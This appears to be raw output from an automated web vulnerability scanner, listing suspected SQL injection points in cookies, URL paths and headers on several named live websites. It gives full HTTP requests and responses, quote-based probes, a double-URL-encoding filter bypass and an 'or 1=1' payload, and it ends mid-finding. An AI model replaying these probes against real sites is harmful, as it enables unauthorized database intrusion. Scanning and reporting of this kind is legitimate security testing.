HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:13:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/ Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:14:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 202
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2
Request 2
GET /mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response 2
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:14:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/ Location: http://www.yourpurecrushes.com/hv1/blender_redirect.php?web_id=CD1&&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The mt_clk cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mt_clk cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a'; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response 1
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 05:14:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 202
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''54267db83a49b89cd0644d669488302a'' and record_adjust2=1' at line 2
Request 2
GET /mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= HTTP/1.1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b89cd0644d669488302a''; mt_lds=54267db83a49b89cd0644d669488302a; PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6;
Response 2
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:14:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b89cd0644d669488302a%27%27; path=/ Location: http://www.socialtrack.net/click.track?CID=121402&AFID=73472&ADID=297792&SUBID=CD1 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The com.pogo.ga cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.ga cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /?pageSection=homnav_logo HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga='; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The com.pogo.info cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.info cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the com.pogo.info cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /action/pogop/welcome.do?intcmp=cp_10price_1110_cpcom_bottomtext HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The com.pogo.info cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.info cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the com.pogo.info cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /home/home.jsp?sls=2&site=pogo HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71%2527; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The com.pogo.unid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.unid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the com.pogo.unid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /home/home.jsp?sls=2&site=pogo HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856%2527; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true'; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
1.23. http://www.pogo.com/img/prize/en_US/cash-giveaway [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.pogo.com
Path: /img/prize/en_US/cash-giveaway
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19192500'%20or%201%3d1--%20 and 19192500'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /img/prize/en_US/cash-giveaway?119192500'%20or%201%3d1--%20=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
<h1>The page you requested could not be found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br /> <strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong> <div class="clear20"></div>
<h1>The page you requested could not be found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble finding a particular page try visiting the<br /> <strong><a href="http://www.pogo.com/">Pogo.com home page</a></strong> or <strong><a href="http://www.pogo.com/sitemap">sitemap</a></strong> <div class="clear20"></div>
The com.pogo.hp.ls.cfg cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the com.pogo.hp.ls.cfg cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /prize/prize.do?pageSection=footer_prize HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0'; com.pogo.tafrcode=;
The op600clubpogoliid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the op600clubpogoliid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /prize/prize.do?pageSection=footer_prize HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e'; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The PHPSESSID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PHPSESSID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the PHPSESSID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /peanut-labs-acquired-by-online-research-company-e-rewards-2/ HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04%2527; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;
Response 1
HTTP/1.1 500 Internal Server Error Date: Sun, 09 Jan 2011 07:24:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 07:24:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Conte ...[SNIP]...
Request 2
GET /peanut-labs-acquired-by-online-research-company-e-rewards-2/ HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04%2527%2527; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;
Response 2
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 07:24:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 X-Pingback: http://www1.peanutlabs.com/xmlrpc.php Link: <http://www1.peanutlabs.com/?p=568>; rel=shortlink Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29570
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /wp-content/plugins/contact-form-7%2527/scripts.js HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;
Response 1
HTTP/1.1 500 Internal Server Error Date: Sun, 09 Jan 2011 07:24:33 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 07:24:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Conte ...[SNIP]...
Request 2
GET /wp-content/plugins/contact-form-7%2527%2527/scripts.js HTTP/1.1 Host: www1.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;
Response 2
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 07:24:33 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.5 X-Pingback: http://www1.peanutlabs.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 07:24:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 40811
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
